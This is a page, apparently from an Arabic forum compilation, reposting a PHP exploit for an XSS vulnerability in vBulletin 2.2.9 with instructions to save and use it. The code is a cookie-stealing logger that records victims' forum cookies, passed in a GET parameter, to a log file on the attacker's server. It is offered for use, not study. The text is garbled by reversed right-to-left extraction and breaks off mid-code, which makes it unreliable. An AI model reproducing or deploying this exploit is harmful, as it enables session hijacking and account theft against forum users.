Page 327 - بسم الله الرحمن الرحيم

P. 327

" vBulletin 2,2,9 ‫" ثغرة في منتديات‬

<‫>منقول من منتدى ابن مصر‬
<‫ المدمر‬:‫>الكاتب‬

....vBulletin 2.2.9 ‫هذه الثغرة ختطيرة جهدا وتصؤدي بحاية المنتديات‬

:‫المهم شرحها كالتالي‬

php ‫ انسخ الكود واحفظه بالمفكرة بامتداد‬-1
PHP?>

vBulletin XSS Injection Vulnerability: Exploit //
--- //

.(Coded By : Sp.IC (SpeedICNet@Hotmail.Com //
.Descrption: Fetching vBulletin's cookies and storing it into a log file //

:Variables //

;"LogFile = "Cookies.Log$

:Functions //
*/

} ("If ($HTTP_GET_VARS['Action'] = "Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else

;"" = Header$
;"" = Footer$

{
;(Print ($Header

/*
;("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title

;("<Print ("<Pre
;("<Print ("<Center
;("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%

*/
;(Print ($Footer

} (['Switch ($HTTP_GET_VARS['Action
:"Case "Log

;['Data = $HTTP_GET_VARS['Cookie$

327

322 323 324 325 326 327 328 329 330 331 332